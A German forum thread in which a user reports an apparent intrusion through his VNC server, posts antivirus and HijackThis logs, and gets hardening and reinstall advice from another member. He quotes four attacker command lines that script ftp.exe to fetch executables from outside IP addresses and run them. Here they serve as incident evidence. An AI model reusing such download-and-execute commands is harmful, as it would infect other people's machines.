Hi Leute,

vorab meine Story, die übrigens die merkwürdigste ist, die ich je an meinem System beobachtete.

Ich wohne in Hamburg und mein Kumpel in Berlin brauchte Hilfe an seinem Rechner. Da mir Skype-Sessions, ohne seinen Desktop zu sehen, viel zu anstrengend sind, wollte ich mit ihm zusammen VNC installieren. Dabei stellte sich heraus, dass er genau wie ich hinter nem Router sitzt, folglich die Ports (5900 VNC-Client + 5800 für Browser(Java)-basierten Zugriff) zu forwarden sind. Das klappte letztlich bei mir, bei ihm leider nicht, da komischerweise Menupunkte in seinem Router nicht aktivierbar waren. Aber das ist eine andere Geschichte. Ich war mittlerweile heiß auf VNC geworden und richtete mir wieder einen DynDNS-Account ein, um auch von unterwegs (ich bin werktags in Köln) bei Bedarf via VNC an meinen Rechner zu kommen. Ich testete, ob mein Router die IP ordnungsgemäß weiterleitete, indem ich versuchte webbasiert auf meinen Rechner zu kommen. Das funktionierte dann auch gut. Den VNC-Server lies ich mit aktivem Passwort und der Einstellung, dass bei ner Verbindung das Hintergrundbild nicht mit übertragen wird, an.

Dann ging ich per Ausführen-Dialog (Windows+R) per regedit in meine Registry, wo ich einen Wert überprüfen wollte, der eigentlich den AV-Notifier in Vergangenheit zuverlässig blockte, aber seit neuestem eben nicht mehr. Der Wert stimmte, so schloss ich zumindest RegEdit. Der Ausführen-Dialog war vermutlich noch offen.

Dann startete ich MobileMaster (was ich erst kürzlich zuverlässig [via IR] zum Laufen brachte), um mein Handy mit meinem System zu synchronisieren. Dann dachte ich mir, lieber zuvor mal den Dateimanager von Nokia PCSuite zu checken und schloss den MobileMaster direkt wieder. Und jetzt kommts:

Nun ging mein Hintergrundbild weg, wurde grau. Mein Blick ging direkt aufs SysTray, wo gerade mein VNC-Tray von weiß auf schwarz wechselte. Das bedeutet normalerweise, dass sich jmd darauf eingelogged hat. Als wenn dies aufgrund des Passwortes nicht schon unmöglich genug ist, ging mein Blick nach unten links, wo sich gerade im Ausführen-Dialog wilde ewig lange Kommandos (sowas wie @echo, exit, blablabla) wie von Geisterhand eintrugen.

Ich schaltete aus Panik direkt meinen Rechner aus, da mir dies gewaltig suspekt vorkam.

Danach fiel mir ein, dass ich in meinem Browser noch nen Tab offen gehabt haben könnte, welcher versucht haben könnte auf <meinAcc>.dyndns.org:5800 zuzugreifen. Ich hatte ja zuvor (siehe oben) mehrmals versucht, das IP-Forwarding meines Routers an meinen DynDNS-Account zu testen. Da könnte eben noch ein Tab offen gewesen sein, der zuvor keine Verbindung zustande bringen konnte.
Wie auch immer: Ich testete, wann das VNC-Tray-Icon schwarz wird. Dies geschieht erst nachdem man mit dem Passwort Zugriff erhält. Ein simples <meinAcc>.dyndns.org:5800 [Enter] reicht also nicht, so dass meine Vermutung mit dem Tab eigentlich flach fällt. Wie ihr jedoch merkt, poste ich hier die gesamte Story, da ich mir überhaupt nicht mehr sicher bin.

Leider hatte ich keine weitere Zeit, mich darum zu kümmern, da ich (siehe oben) werktags in Köln arbeite und am Wochenende in Hamburg bin, wo auch mein Rechner steht. Am darauf folgenden Wochenende war ich dann im Westerwald bei meinen Ellis, um den Bday meiner Sister zu feiern. Meine Freundin (in Hamburg) brauchte jedoch dringend Nachhilfe in Mathe. Ich dachte mir, dass wir die Nachhilfe, wenn wir sie schon auf diese Distanz machen müssen, doch via VNC wunderbar mit Excel, Notepad und dem Formeleditor von Word zusammen an meinem Hamburger Rechner machen können. Gesagt getan, ich connectete und alles funktionierte recht gut. Während dieser VNC-Session passierte jedoch immer wieder Folgendes:

Der Ausführen-Dialog (Windows + R) öffnete sich selbständig und schrieb:

- Beim ersten Mal:
cmd /c echo OPEN 78.54.0.181 31839>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

- Beim zweiten Mal:
cmd /c echo OPEN 78.54.182.212 15531>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

- Beim dritten Mal:
cmd /c echo open 85.179.104.152 3609 >> i &echo user anfwen anfwen >> i &echo get msoft60412.exe >> i &echo quit >> i &ftp -nv -s:i &msoft60412.exe &exit

- Beim vierten Mal:
cmd /c echo open 85.179.104.152 3609 >> i &echo user ktfqfp ktfqfp >> i &echo get msoft32313.exe >> i &echo quit >> i &ftp -nv -s:i &msoft32313.exe &exit

Beim jedem Mal ging die Commando-Shell mit connect <ip> auf. Daraufhin meldete sich meine Firewall mit etwas in der Art des Folgenden (jedoch immer war ftp.exe darin enthalten):

Programm zur dateiübertr (ftp.exe) versucht eine verb herzust. [85.179.104.152] nutzt den remote-port 3609. möchten sie diesem programm den zugriff auf das netzwerk erlauben ?

Dateiversion : 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
Dateibeschreibung : Programm zur Dateiübertragung (ftp.exe)
Dateipfad : C:\WINDOWS\system32\ftp.exe
Prozess-ID : DCC (Heximal) 3532 (Dezimal)

Verbindungsursprung : lokal initiert
Protokoll : TCP
Lokale Adresse : 192.168.0.78
Lokaler Port : 2396
Remote-Name :
Remote-Adresse : 85.179.104.152
Remote-Port : 3609

Ethernet-Paket-Details:
Ethernet II (Packet Length: 76)
Destination: 00-17-9a-59-3d-e3
Source: 00-e0-7d-8f-10-15
Type: IP (0x0800)
Internet Protocol
Version: 4
Header Length: 20 bytes
Flags:
.1.. = Don't fragment: Set
..0. = More fragments: Not set
Fragment offset:0
Time to live: 128
Protocol: 0x6 (TCP - Transmission Control Protocol)
Header checksum: 0xecd1 (Correct)
Source: 192.168.0.78
Destination: 85.179.104.152
Transmission Control Protocol (TCP)
Source port: 2396
Destination port: 3609
Sequence number: 2008314393
Acknowledgment number: 0
Header length: 28
Flags:
0... .... = Congestion Window Reduce (CWR): Not set
.0.. .... = ECN-Echo: Not set
..0. .... = Urgent: Not set
...0 .... = Acknowledgment: Not set
.... 0... = Push: Not set
.... .0.. = Reset: Not set
.... ..1. = Syn: Set
.... ...0 = Fin: Not set
Checksum: 0x9b02 (Correct)
Data (0 Bytes)

Binäres Abbild des Pakets:
0000: 00 17 9A 59 3D E3 00 E0 : 7D 8F 10 15 08 00 45 00 | ...Y=...}.....E.
0010: 00 30 A9 99 40 00 80 06 : D1 EC C0 A8 00 4E 55 B3 | .0..@........NU.
0020: 68 98 09 5C 0E 19 77 B4 : 72 19 00 00 00 00 70 02 | h..\..w.r.....p.
0030: FF FF 02 9B 00 00 02 04 : 05 B4 01 01 04 02 00 0C | ................
0040: 00 15 FF FF FF 11 00 3F : 3F 3F 3F 3F | .......?????

Diesen Dialog lies ich einfach stehen und dann ging die Windows-Commando-Shell irgendwann automatisch wieder zu. Meine Firewall hat hoffentlich Schlimmeres vermeiden können.

Mein System:
- WinXP 2002 SP2 + further patches
- AMD XP+ 3200 Barton
- 1 GB RAM
- Sygate Firewall 5.5 build 2364
- AntiVir (ständig up to date)
- SpyWareGuard
- TrojanCheck Guard mit aktivierter Prozeßüberwachung (Autostart lasse ich von anderem Tool ständig überwachen)
- SpyBot-SD Resident TeaTimer zur Autostart-Überwachung (im Zweifel gehe ich immer auf "nicht erlauben")
- Browser Firefox neueste Version
- Email Thunderbird neueste Version

So jetzt seid ihr daran, mir bitte zu sagen, was hier los ist. Ich mache mich schon mal daran einen HJT-Log zu erzeugen, um ihn hier im Anschluß zu posten.

Vielen Dank schonmal

**************************************************************
**************************************************************

E S C A N - L O G

HINWEIS: DARUNTER KOMMT DANN DER H J T - L O G

**************************************************************
**************************************************************

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Header
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
find.bat Version 2007.06.16.01

Microsoft Windows XP [Version 5.1.2600]
Bootmodus: NETWORK

eScan Version: 9.5.4
Sprache: English
C:\DOKUME~1\ADMINI~1\LOKALE~1\Temp\MWAV.LOG

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Infektionsmeldungen
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
System found infected with ezula Spyware/Adware (ebay.url)! Action taken: No Action Taken.
System found infected with purityscan Spyware/Adware (min.html)! Action taken: No Action Taken.
System found infected with bonzibuddy Spyware/Adware (spchapi.exe)! Action taken: No Action Taken.
System found infected with bonzibuddy Spyware/Adware (spchapi.exe)! Action taken: No Action Taken.
System found infected with ezula Spyware/Adware (ebay.url)! Action taken: No Action Taken.
System found infected with purityscan Spyware/Adware (min.html)! Action taken: No Action Taken.
System found infected with bonzibuddy Spyware/Adware (spchapi.exe)! Action taken: No Action Taken.
System found infected with bonzibuddy Spyware/Adware (spchapi.exe)! Action taken: No Action Taken.
System found infected with bemonitor Spyware/Adware (C:\WINDOWS\tmp)! Action taken: No Action Taken.
Object "gain.gator Spyware/Adware" found in File System! Action Taken: No Action Taken.
Object "gain.gator Spyware/Adware" found in File System! Action Taken: No Action Taken.
Object "gain.gator Spyware/Adware" found in File System! Action Taken: No Action Taken.
~~~~~~~~~~~
Dateien
~~~~~~~~~~~
~~~~ Infected files
~~~~~~~~~~~
File C:\System Volume Information\_restore{4EA59174-DB49-4A96-B24A-3C9F60E268D3}\RP281\A0023606.exe infected by "NULL.Corrupted" Virus! Action Taken: No Action Taken.
~~~~~~~~~~~
~~~~ Tagged files
~~~~~~~~~~~
File C:\Programme\RealVNC\VNC4\WinVNC4.exe tagged as "not-a-virus:RemoteAdmin.Win32.WinVNC.4110". No Action Taken.
File C:\Programme\RealVNC\VNC4\winvnc4.exe tagged as "not-a-virus:RemoteAdmin.Win32.WinVNC.4110". No Action Taken.
File C:\Programme\RealVNC\VNC4\wm_hooks.dll tagged as "not-a-virus:RemoteAdmin.Win32.WinVNC.4". No Action Taken.
File D:\My_Files\daten laptop\myFilesHannover\installExe\vnc-4_1_1-x86_win32.exe//file1 tagged as "not-a-virus:RemoteAdmin.Win32.WinVNC.4". No Action Taken.
~~~~~~~~~~~
~~~~ Offending files
~~~~~~~~~~~
Offending file found: D:\My_Files\system\datenbanken\favoriten\links\ebay.url
Offending file found: D:\My_Files\system\install_exe\progs\stuff\page macromedia etc\self_php\funktionsreferenz\mathematische_funktionen\min.html
Offending file found: D:\My_Files\system\install_exe\progs\stuff\personaltranslator pt2001 officeplus 'deutsch'\speech\english\spchapi.exe
Offending file found: D:\My_Files\system\install_exe\progs\stuff\personaltranslator pt2001 officeplus 'deutsch'\speech\german\spchapi.exe
Offending file found: D:\My_Files\system\datenbanken\favoriten\links\ebay.url
Offending file found: D:\My_Files\system\install_exe\progs\stuff\page macromedia etc\self_php\funktionsreferenz\mathematische_funktionen\min.html
Offending file found: D:\My_Files\system\install_exe\progs\stuff\personaltranslator pt2001 officeplus 'deutsch'\speech\english\spchapi.exe
Offending file found: D:\My_Files\system\install_exe\progs\stuff\personaltranslator pt2001 officeplus 'deutsch'\speech\german\spchapi.exe
Offending file found: C:\WINDOWS\tmp
~~~~~~~~~~~
Ordner
~~~~~~~~~~~
~~~~~~~~~~~
Registry
~~~~~~~~~~~
Offending Key found: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\gator.com !!!
Offending Key found: HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\p3p\history\gator.com !!!
Offending Key found: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\p3p\history\gator.com !!!


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Diverses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
Prozesse und Module
~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~
Scanfehler
~~~~~~~~~~~~~~~~~~~~~~
C:\Programme\Nero\Nero 7\Nero Mobile\SetupNeroMobileSigned.exe not Scanned. Possibly password protected...
C:\Programme\Nero\Nero 7\Nero Mobile\SetupNeroMobileUnsigned.exe not Scanned. Possibly password protected...
D:\My_Files\Downloads\gamersday-highqual.zip not Scanned. Possibly password protected...
~~~~~~~~~~~~~~~~~~~~~~
Hosts-Datei
~~~~~~~~~~~~~~~~~~~~~~
DataBasePath: %SystemRoot%\System32\drivers\etc
C:\WINDOWS\System32\drivers\etc\hosts :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Statistiken:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan-Optionen
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Memory Check: Enabled
Registry Check: Enabled
System Folder Check: Enabled
System Area Check: Disabled
Services Check: Enabled
Drive Check: Disabled
All Drive Check :Enabled
All Drive Check :Enabled

Batchstart: 16:24:14,89
Batchende: 16:24:24,78


**************************************************************
**************************************************************

H J T - L O G

**************************************************************
**************************************************************

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 17:19:52, on 10.11.2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Programme\Sygate\SPF\smc.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\AntiVir PersonalEdition Classic\sched.exe
C:\Programme\AntiVir PersonalEdition Classic\avguard.exe
C:\Programme\Microsoft LifeCam\MSCamSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\MsPMSPSv.exe
C:\Programme\Raxco\PerfectDisk\PDSched.exe
C:\WINDOWS\system32\devldr32.exe
C:\Programme\Trojancheck 6\tcguard.exe
C:\Programme\AntiVir PersonalEdition Classic\avgnt.exe
C:\WINDOWS\system32\RUNDLL32.EXE
C:\Programme\Creative\MediaSource\Detector\CTDetect.exe
C:\PROGRA~1\ALLTOTRAY\ALLTOTRAY.EXE
C:\Programme\Spybot - Search & Destroy\TeaTimer.exe
C:\Programme\CoolMenu\CoolMenu.exe
C:\Programme\SpywareGuard\sgmain.exe
C:\Programme\SpywareGuard\sgbhp.exe
C:\WINDOWS\System32\svchost.exe
C:\PROGRA~1\MOZILL~1\FIREFOX.EXE
C:\WINDOWS\explorer.exe
C:\Programme\HiJackThis\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SpywareGuard Download Protection - {4A368E80-174F-4872-96B5-0B27DDD11DB2} - C:\Programme\SpywareGuard\dlprotect.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O4 - HKLM\..\Run: [Trojancheck 6 Guard] C:\Programme\Trojancheck 6\tcguard.exe
O4 - HKLM\..\Run: [avgnt] "C:\Programme\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKCU\..\Run: [Creative Detector] C:\Programme\Creative\MediaSource\Detector\CTDetect.exe /R
O4 - HKCU\..\Run: [AllToTray] C:\PROGRA~1\ALLTOT~1\ALLTOT~1.EXE
O4 - HKCU\..\Run: [WindowBlinds] C:\Programme\Stardock\Object Desktop\WindowBlinds\WBInstall32.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Programme\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'LOKALER DIENST')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'NETZWERKDIENST')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\System32\CTFMON.EXE (User 'Default user')
O4 - S-1-5-18 Startup: DSL-Manager.lnk = C:\Programme\DSL-Manager\DslMgr.exe (User 'SYSTEM')
O4 - .DEFAULT Startup: DSL-Manager.lnk = C:\Programme\DSL-Manager\DslMgr.exe (User 'Default user')
O4 - Startup: CoolMenu.lnk = C:\Programme\CoolMenu\CoolMenu.exe
O4 - Startup: SpywareGuard.lnk = C:\Programme\SpywareGuard\sgmain.exe
O8 - Extra context menu item: &WordWeb... - res://C:\WINDOWS\system32\wweb32.dll/lookup.html
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Konsole - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programme\Java\jre1.5.0_09\bin\ssv.dll
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O17 - HKLM\System\CCS\Services\Tcpip\..\{096E916E-FF93-4405-A2A8-41C14C3C0A9F}: NameServer = 192.168.0.1
O17 - HKLM\System\CS1\Services\Tcpip\..\{096E916E-FF93-4405-A2A8-41C14C3C0A9F}: NameServer = 192.168.0.1
O17 - HKLM\System\CS3\Services\Tcpip\..\{096E916E-FF93-4405-A2A8-41C14C3C0A9F}: NameServer = 192.168.0.1
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL
O23 - Service: AntiVir PersonalEdition Classic Planer (AntiVirScheduler) - Avira GmbH - C:\Programme\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Programme\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programme\Gemeinsame Dateien\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: PDEngine - Raxco Software, Inc. - C:\Programme\Raxco\PerfectDisk\PDEngine.exe
O23 - Service: PDScheduler (PDSched) - Raxco Software, Inc. - C:\Programme\Raxco\PerfectDisk\PDSched.exe
O23 - Service: Sygate Personal Firewall (SmcService) - Sygate Technologies, Inc. - C:\Programme\Sygate\SPF\smc.exe
O23 - Service: DSL-Manager (TDslMgrService) - T-Systems Enterprise Services GmbH - C:\Programme\DSL-Manager\DslMgrSvc.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - RealVNC Ltd. - C:\Programme\RealVNC\VNC4\WinVNC4.exe

--
End of file - 5278 bytes


**************************************************************
**************************************************************

MEINE BEMERKUNGEN

**************************************************************
**************************************************************

1. Was sollte ich wegen des eScan-Logs unternehmen ?

2. Ist mein HJT-Log in Ordnung ? Mache mir atm recht große Sorgen wegen Keyloggern.

B I T T E NUR ANTWORTEN, WENN IHR EUCH ZIEMLICH SICHER SEID, DAS PROBLEM ZU KENNEN.
Bin leider nur am Wochenende an meinem Rechner, daher also nur begrenzt Zeit meinen Rechner zu warten. Außerdem möchte meine Freundin am WE auch noch was von mir haben. Wenn ich dann wegen "es könnte evtl" auf die Suche gehe, ist es mir die Zeit einfach nicht wert.

Also bitte net bös sein, wegen der Bemerkung. Ich hoffe, dass ihr mich versteht.

Vielen Dank

Hallo.

Zitat:

Nun ging mein Hintergrundbild weg, wurde grau. Mein Blick ging direkt aufs SysTray, wo gerade mein VNC-Tray von weiß auf schwarz wechselte. Das bedeutet normalerweise, dass sich jmd darauf eingelogged hat. Als wenn dies aufgrund des Passwortes nicht schon unmöglich genug ist, ging mein Blick nach unten links, wo sich gerade im Ausführen-Dialog wilde ewig lange Kommandos (sowas wie @echo, exit, blablabla) wie von Geisterhand eintrugen.

Vermutlich ist jemand über den VNC-Server in dein System eingebrochen. Hast du die aktuellste Version vom VNC-Server denn auch drauf? Es werden nämlich immer wieder mal Sicherheitslücken gefunden, die es Angreifern ermöglicht ins System einzudringen. Du hast den Rechner bzw. den VNC-Zugang auch nicht gerade besonders abgesichert. Sinnvoll wäre es, den VNC-Server auf einen Port horchen zu lassen, die Standardports 5800/5900 werden ja gleich sofort gefunden.

Wie stark ist denn das VNC-Passwort? Also Länge und Zeichensatz wäre interessant zu wissen.

Fast bombensicher bekommst du VNC, wenn du ihn noch mittels SSH tunnelst
=> HowTo für sicheres VNC mittels SSH

Zitat:

1. Was sollte ich wegen des eScan-Logs unternehmen ?

Wenn ich das richtig gesehen habe, zeigt eScan/mwav da nur Fehlalarme an.

Zitat:

2. Ist mein HJT-Log in Ordnung ? Mache mir atm recht große Sorgen wegen Keyloggern.

Sieht soweit auch okay aus. Aber mir würde es große Sorgen bereiten, dass ein Angreifer bereits Zugang zum System hatte! Der konnte da schon rel. viel umbiegen, je nachdem welche rechte der z.Z. angemeldete Benutzer hatte.
Wenn du den Verdacht auf Keyloggern hast, solltest du scheunigst sämtliche Passwörter ändern. Nat. alles von einem garantiert sauberen Rechner aus.

Zitat:

Hast du die aktuellste Version vom VNC-Server denn auch drauf?

VNC-Server Free Edition 4.1.1

Zitat:

Wie stark ist denn das VNC-Passwort? Also Länge und Zeichensatz wäre interessant zu wissen.

Also das Passwort war beim ersten Mal recht unsicher; ich glaube alles nur kleine Buchstaben (6 oder 7). Jedoch beim zweiten Mal (Nachhilfestunde mit meiner Freundin) hatte ich ein 7-stelliges Paßwort mit Buchstaben, Zahlen und Sonderzeichen.

Zitat:

Sinnvoll wäre es, den VNC-Server auf einen Port horchen zu lassen,

Was meinst du denn damit ? Etwa, dass ich einfach andere beliebige Ports wählen soll ?

Zitat:

Vermutlich ist jemand über den VNC-Server in dein System eingebrochen.

Wie soll man sich das vorstellen. Meinst du, dass da jmd menschliches hinter ner Shell sitzt und ala Matrix am hacken ist oder sind das Proggis, die die Standardports ganzer IP-Ranges absuchen, ob da irgendwo nen unsicherer VNC-Server läuft ?

Ich stelle mir eher Zweiteres vor, wo dann das Programm bei Erfolg (Eindringen durch VNC-Lücke u/o Port) versucht von nem Server im Web ne Datei zu laden, um sie anschließend auf dem System auszuführen und schadhaften Code zu platzieren. Wenn ich da richtig liege, dann hat halt nen Proggie versucht, etwas zu laden, aber konnte den DL aufgrund meiner FW gar nicht starten. Ergo, wenn ich mein VNC sicherer mache, dann brauche ich mir keine Sorgen mehr machen, oder ?

Kannst du denn was mit den 4 Kommandos anfangen ? Alles was ich daraus lese, ist, dass eine Datei geholt werden sollte. Den Rest verstehe ich nicht.

Zitat:

Aber mir würde es große Sorgen bereiten, dass ein Angreifer bereits Zugang zum System hatte! Der konnte da schon rel. viel umbiegen, je nachdem welche rechte der z.Z. angemeldete Benutzer hatte.

Zu diesen Zeitpunkten war ich jeweils Admin auf meinem System.

Gehen wir davon aus, dass du Recht hast und jemand auf meinem Rechner war und etwas ändern konnte. Wie soll ich denn herausfinden, wo er etwas geändert hat, um sein krankes Hirn zu befriedigen ?

Wenn da ein Prozeß und/oder Dienst laufen würde, welchen ihr nicht kennt, dann würdet ihr dies doch an den Logs sehen, oder ?

Bist du dir 100%ig sicher, dass beiden Logs nichts Verdächtiges zu entnehmen ist ?

Zitat:

Wenn du den Verdacht auf Keyloggern hast, solltest du scheunigst sämtliche Passwörter ändern. Nat. alles von einem garantiert sauberen Rechner aus.

Ich habe ja nichts Konkretes für meinen Verdacht. Es ist eher die Angst davor, denke ich.

Wie auch immer, nehmen wir an, ich ändere die PWörter auf nem sauberen Rechner. Wenn ich tatsächlich von nem Keylogger befallen bin, dann hat er doch spätestens beim nächsten Login über meinen Rechner das neue PW wieder.
Ich möchte sicherstellen, dass ich keinen Keylogger habe, wie soll ich dies bewerkstelligen, wenn man in meinen Logs nichts sehen kann ? Hast du da Tipps auf Lager ?

Vielen Dank bisher schonmal

Zitat:

VNC-Server Free Edition 4.1.1

Sagt mir persönlich nichts, ich verwende UltraVNC (Opensource). Du solltest immer auf aktuelle Versionen achten und die einspielen.

Zitat:

Also das Passwort war beim ersten Mal recht unsicher; ich glaube alles nur kleine Buchstaben (6 oder 7). Beim zweiten Mal (Nachhilfestunde mit meiner Freundin) jedoch hatte ich ein 7-stelliges Paßwort mit Buchstaben, Zahlen und Sonderzeichen.

Sieben Stellen sollten eigentlich recht sicher sein. V.a. bei diesem Zeichensatz.

Zitat:

Was meinst du denn damit ? Etwa, dass ich einfach andere beliebige Ports wählen soll ?

Jap. Kann man im VNC-Server einstellen. Du kannst dir irgendeinen Port aussuchen, z.B. 33215. Ist etwas sicherer, da der Standartport als erstes ausprobiert wird. Bei einem anderen nicht bekannten Port, müsste erstmal über einen Portscanner dieser ausfindig gemacht werden.

Zitat:

Wie soll man sich das vorstellen. Meinst du, dass da jmd menschliches hinter ner Shell sitzt und ala Matrix am hacken ist oder sind das Proggis, die die Standardports ganzer IP-Ranges absuchen, ob da irgendwo nen unsicherer VNC-Server läuft ?

Ich vermute, dass Cracker irgenwelche Scripte/Programme geschrieben haben, um ganze IP-Ranges nach offenen 5800/5900 Ports abzusuchen. Wenn sie einen Rechner gefunden haben, werden sie vermutlich mehrere Exploits auf die Kiste loslassen, um sich Zugang zu verschaffen. Das klappt aber nur bei alten VNC-Server mit Sicherheitslücken. Bei einem aktuellen VNC-Server, wo die Lücken gefixt sind, d.h. keine bekannten Lücken mehr da sind, wirds für die Cracker schwieriger. Da probieren sie dann wahrscheinlich einfach nur ein paar Passwörter aus um auf die Kiste zu gelangen. Hatte ich selber schon mal gesehen, jedenfalls schließ ich das daraus. Und zwar hatte ein Bekannter von mir auf seinem Rechner auch VNC installiert, war übers Internet erreichbar. Scheinbar hatte ein Dritter versucht darauf zu kommen, allerdings ohne Erfolg. Die Zugangsversuche wurden im Ereignisprotokoll angezeigt. Das könntest du übrigens auch mal nachschauen. Normalerweise wird auch die IP-Adresse protokolliert.

Zitat:

Ich stelle mir eher Zweiteres vor, wo dann das Programm bei Erfolg (Eindringen durch VNC-Lücke u/o Port) versucht von nem Server im Web ne Datei zu laden, um sie anschließend auf dem System auszuführen und schadhaften Code zu platzieren.

Ja, so meinte ich das ja auch. Aber der Einbruch gelangüber ein schlecht abgeischertes VNC. Nachdem Einbruch wird der Angreifer nat. seinen Zugriff sicherstellen, in dem er irgendwas zusätzliches installiert, z.B. eine Backdoor. Das wäre dann die von dir erwähnte Schädlingsdatei.

Zitat:

Ergo, wenn ich mein VNC sicherer mache, dann brauche ich mir keine Sorgen mehr machen, oder ?

So einfach kann man das nicht sagen. Welche Rechte hatte der Angreifer denn gerade? Bei Adminrechten wäre es nämlich locker möglich, die PFW abzuschalten. Vllt hater auch er selber kurzerhand auf Erlauben geklickt. Die PFW würde ich da nicht als große Hürde einstufen. Man weiß auch nicht, ob der Angreifer nur diese Kommandos ausgeführt hat oder ob er noch mehr gemacht hat.

Zitat:

Kannst du denn was mit den 4 Kommandos anfangen ? Alles was ich daraus lese, ist, dass eine Datei geholt werden sollte. Den Rest verstehe ich nicht.

Hier ist eine Beschreibung der Optionen für ftp.exe.

Der wollte auf jeden Fall bestimmte Dateien herunterladen und hat versucht, weitere ftp-befehle auszuführen. Sehr wahrscheinlich mit dem Ziel, die heruntergeladenen exe-Dateien auf deiner Kiste ausführen zu lassen.

Zitat:

Zu diesen Zeitpunkten war ich Admin auf meinem System.

Das ist weniger gut...

Zitat:

Wie soll ich denn herausfinden, wo er etwas geändert hat, um sein krankes Hirn zu befriedigen ?

Alle Änderungen zu erfassen ist quasi unmöglich. Wenn du wieder ein garantiert vertrauenswürdiges System haben willst, muss du neu aufsetzen oder ein sauberes Image zurückspielen.

Zitat:

Wenn da ein Prozeß und/oder Dienst laufen würde, welchen ihr nicht kennt, dann würdet ihr dies doch an den Logs sehen, oder ?
Bist du dir 100%ig sicher, dass beiden Logs nichts Verdächtiges zu entnehmen ist ?

Ich hab dort nichts Auffälliges gesehen. D.h. aber nicht, dass dein System auch wirklich sauber ist!

Zitat:

Wenn ich tatsächlich von nem Keylogger befallen bin, dann hat er doch spätestens beim nächsten Login über meinen Rechner das neue PW wieder.

Das schon, aber durch die geänderten Passwörter hat der Angreifer schonmal keinen Zugriff mehr. Wenn du denn einen Keylogger in deinem Rechner vermutest, darfst du mit dem nicht mehr ins Internet!

Zitat:

Ich möchte sicherstellen, dass ich keinen Keylogger habe, wie soll ich dies bewerkstelligen, wenn man in meinen Logs nichts sehen kann ? Hast du da Tipps auf Lager ?

Wie schon erwähnt, wenn man sichergehen will, und das ist verständlich bei deinem doch recht kritischen Vorfall, musst du neu aufsetzen. Dann hast du garantiert keine Überreste des Angreifers mehr im System.

